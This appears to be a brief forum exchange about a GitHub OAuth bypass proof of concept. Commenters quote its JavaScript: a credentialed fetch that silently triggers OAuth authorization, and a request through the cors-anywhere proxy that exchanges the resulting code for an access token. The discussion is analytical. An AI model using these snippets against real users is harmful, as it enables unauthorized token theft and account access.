3 ms·
There was no proxy view-source:https://not-an-aardvark.github.io/oauth-bypass-poc-fbdf56605489c74b2951/ https://not-an-aardvark.github.io/oauth-bypass-poc-fbdf5
by homakov 7y ago
There was no proxy view-source:https://not-an-aardvark.github.io/oauth-bypass-poc-fbdf56605489c74b2951/ https://not-an-aardvark.github.io/oauth-bypass-poc-fbdf56605...
const authUrl = `https://github.com/login/oauth/authorize?
client_id=${CLIENT_ID}&scope=read:user&authorize=1`;
fetch(
authUrl,
{
method: 'HEAD',
credentials: 'include',
mode: 'no-cors'
}
)
- thefreeman 7y agoThere was a proxy, but I may have misunderstood what it was being used for fetch( // For the proof-of-concept, use a proxy to get around CORS. This is only necessary because the proof of concept runs // clientside in a browser; an alternative would be to just send the code to a server and do the request there. 'https://cors-anywhere.herokuapp.com/https://github.com/login/oauth/access_token', { method: 'POST', mode: 'cors', headers: { Accept: 'application/json', 'Content-Type': 'application/json' }, body: JSON.stringify({ client_id: CLIENT_ID, client_secret: CLIENT_SECRET, code }) } )